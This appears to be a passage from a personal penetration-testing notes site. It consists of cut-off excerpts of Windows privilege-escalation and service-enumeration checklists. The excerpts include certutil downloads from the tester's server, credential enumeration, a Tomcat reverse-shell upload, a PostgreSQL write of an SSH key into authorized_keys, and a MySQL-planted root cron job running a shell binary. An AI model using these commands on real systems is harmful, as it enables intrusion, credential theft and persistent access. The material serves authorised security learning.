PuTTY stores session information in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Prepare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Prepare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Download most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…
dir General: Usual commands: Therefore: Remember to use dir /R /as /ah -force. tree Start with creating a list of all directories and files. Download it. It’s way easier to look in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…
General system enumeration Get general information about the OS: systeminfo Get the environment variabes: set Enumerate cached credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…
After these steps, more things to do: Work with processes For enumeration of processes, see the Basic Windows system enumeration post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Suspend and continue a running process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…
Enumeration Mandatory Try to checkout a repo:svn checkout svn://$target Optional Check all branches Go through each revision. (Use grep widely!) Add a new file which could be accessible in the web.
Blue team Use knockd to hide SSH List the arp cache and check if multiple IPs routes to the same physical adress. Maybe a MitM attack is in progress. More secure development If an attacker can write files but not directories, it could be a good idea to store sensitive files in another subdir. If this…
Enumeration Mandatory Check on the HTTP port 8080 if /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse shell WAR file. Optional Try to brute-force with msf> use scanner/http/tomcat_mgr_login.
Enumeration Mandatory Try to connect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can determine the existence of directories.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write. General commands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Possible places: Upload a…
Enumeration Mandatory Optional
Enumeration Optional Brute force with nmap.
Enumeration Mandatory Try to connect. Optional Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/ Try to read files: postgres=# CREATE TABLE demo(t text);CREATE TABLEpostgres=# COPY demo from '/etc/passwd';COPY 20postgres=# SELECT * FROM demo; Try to write a file: COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';
Enumeration Mandatory Try to connect within a window manager:rdesktop $target Optional If you have shell acess, try to create a new user account which is in the group Remote Desktop Users or add this group to an existing user.
Enumeration Mandatory Try to connect to the DB. Enumerate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB: Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
Enumeration Mandatory Determine version:nmap -p 445 --script ms-sql-info $target If credentials are known: Try to connect to the DB (alternative: IntelliJ, …):sqsh -U sa -P $password -S $target:1433 Try to execute commands:msf> use auxiliary/admin/mssql/mssql_execmsf> use windows/mssql/mssql_payload If mssql_exec doesn’t work, take care of domain/username and powershell.exe ‑command type system. Optional Brute-force login (e.g. with msf> use…
Enumeration Mandatory Check configuration:nmap -sSVC --script rmi-dumpregistry -p 1100 $target Optional Try msf> use scanner/misc/java_rmi_server if class upload is possible; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.
Enumeration Mandatory Check which streams are open:nmap --script rtsp-url-brute -p 554 $target
Enumeration Mandatory Enumerate with ike-scan
See the LDAP checklist
Enumeration Mandatory Enumerate with nmap:nmap -n -sV --script "ldap* and not brute" $target Scan with LDAPsearch:ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to SSL ports:openssl s_client -connect $target:636 </dev/nullopenssl s_client -connect $target:3269 </dev/null
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';